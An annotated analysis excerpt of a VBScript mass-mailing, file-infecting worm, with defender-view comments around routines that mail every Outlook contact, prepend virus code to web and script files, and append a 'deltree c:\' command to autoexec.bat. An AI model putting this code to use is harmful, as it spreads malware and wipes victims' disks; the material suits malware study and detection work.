function sendmail() ' Mail-sending routine
' Analysis summary (defender view): this is the mass-mailing stage of the
' annotated sample. It automates Outlook through COM, walks every address
' list, mails each entry that has no per-recipient registry marker yet, then
' mails a fixed recipient list, and finally re-schedules itself.
' Observable artefacts visible in this listing:
'   - a file named readme.html under the folder returned by getspecialfolder(1)
'   - registry values written under the prefix hcuw, one per address list and
'     one per recipient (hcuw is defined outside this excerpt;
'     presumably a registry key path -- confirm)
'   - a script host instantiating "outlook.application" and sending in a loop
' fso, hcuw, title, whb, smailc, readreg and writereg are all defined outside
' this excerpt; what is said about them below is inferred from how they are used.
on error resume next
' Every runtime error is suppressed from here on, so a failing step is skipped
' silently and the sample keeps running.
dim wab,ra,j, oa, arrsm, eins, eaec, fm, wreg, areg,at
' First, mail the encrypted virus code (which can directly infect files) and
' an HTML attachment to the Outlook address book.
' NOTE(review): the next line is the wrapped tail of the annotation above; it
' lost its comment quote during extraction and is kept exactly as found. It
' says the subject is random (the characters for "random" appear garbled) and
' that the routine resembles the "Happy Time" worm, so it is not described further.
主題是雜机的,此过程与“欢乐时光“类似,所以不再描述
randomize
' Path of the attachment: special folder 1 (the system folder) plus "\readme.html".
at=fso.getspecialfolder(1) & "\readme.html"
' Outlook is driven through its automation object and the MAPI namespace.
set oa = createobject("outlook.application")
set wab = oa.getnamespace("mapi")
' Pass 1: every address list known to the MAPI namespace.
for j = 1 to wab.addresslists.count
eins = wab.addresslists(j)
' Value previously stored for this list; an empty result is treated as 1.
wreg=readreg (hcuw & eins)
if (wreg="") then wreg = 1
eaec = eins.addressentries.count
' The list is processed only when it holds more entries than the stored value,
' i.e. when it appears to have grown since the last run.
if (eaec > int(wreg)) then
for x = 1 to eaec
arrsm = wab.addressentries(x)
' A non-empty registry value for this entry means it has been mailed already.
areg = readreg(hcuw & arrsm)
if (areg = "") then
set fm = wab.createitem(0)
with fm
' Subject and body share one entry of the external title array, index 0 to 6.
ra = int(rnd() * 7)
.recipients.add arrsm
.subject = title(ra)
.body = title(ra)
' Attachment step as listed; at holds the readme.html path built above.
.attachments at
.send
' Per-recipient marker so the same entry is not mailed again.
writereg hcuw & arrsm, 1, "reg_dword"
end with
end if
next
end if
' Remember the entry count of this list for the comparison on the next run.
writereg hcuw & eins, eaec, ""
next
' Pass 2: mail is sent unconditionally and in bulk to a fixed set of
' recipients; the annotator reads this as a sign of the virus author's strong
' resentment of the US government. No registry marker is read or written in
' this loop, and no attachment line appears in it.
for j = 1 to smailc
arrsm = whb(j)
set fm = wab.createitem(0)
ra = int(rnd() * 7)
with fm
.recipients.add arrsm
.subject = title(ra)
.body = title(ra)
.send
end with
next
set oa = nothing
' Re-arms the routine through the window object, which suggests the code runs
' inside an HTML page context (confirm against the rest of the sample).
window.settimeout "sendmail()", 5000 ' repeat the sending every 5 seconds
end function
sub searchhtml(path) ' Routine that searches for files that can be infected
' Analysis summary (defender view): this is the file-infection stage of the
' annotated sample. It walks the subfolders of path and hands every file with
' a web or script extension to addhead. addhead, fso and code_str are defined
' outside this excerpt. According to the annotations, addhead prepends virus
' code to the file: encrypted for web files (third argument 1) and unencrypted
' for .vbs files (third argument 2).
' What to look for on a host: an unexpected script block at the head of
' .htm/.html/.plg/.asp/.vbs files. File-integrity monitoring on web content
' and script directories surfaces this kind of change.
on error resume next
' Runtime errors (for example access-denied folders) are suppressed.
dim pfo, psfo, pf, ps, pfi, ext
' Paths that contain special folder 2 (the temporary folder) are left alone.
if instr(path, fso.getspecialfolder(2)) > 0 then exit sub
' NOTE(review): as listed, any path other than exactly "e:\" returns here, so
' the recursive call below returns at once for every subfolder. This may be a
' restriction added for the analysis -- confirm against the original sample.
if path <> "e:\" then exit sub
set pfo = fso.getfolder(path)
set psfo = pfo.subfolders
for each ps in psfo
' Recurse first, then handle the files directly inside this subfolder.
searchhtml(ps.path)
set pf = ps.files
for each pfi in pf
ext = lcase(fso.getextensionname(pfi.path))
' Annotation: check whether the extension is htm, html or plg; if so, check
' whether the file is already infected, and if not, insert the encrypted virus
' code at the head of the file, so that the virus code runs whenever the file
' is executed without affecting the normal execution of the original file.
' The code below additionally accepts asp, and the instr test matches any
' extension that contains "htm".
if instr(ext, "htm") > 0 or ext = "plg" or ext = "asp" then
' Nothing is done for these files when code_str is empty.
if code_str<>"" then addhead pfi.path, pfi, 1
elseif ext= "vbs" then ' for a vbs file, the unencrypted virus code is inserted
addhead pfi.path,pfi, 2
end if
next
next
end sub
sub killhe() '全盘删除文件过程
on error resume next
dim codetext, ko,adi, kd, kh, ks,kf,kfs
codetext = "@echo off" & vbcrlf & "path " & w1 & "command" & vbcrlf &_
"deltree c:\" '将删除c盘的命令插入autoexec.bat 中,下次开机时,删除整个硬盘,并沒有任何提示
set ko = fso.opentextfile("c:\autoexec.bat", 8, true)
ko.write vbcrlf & codetext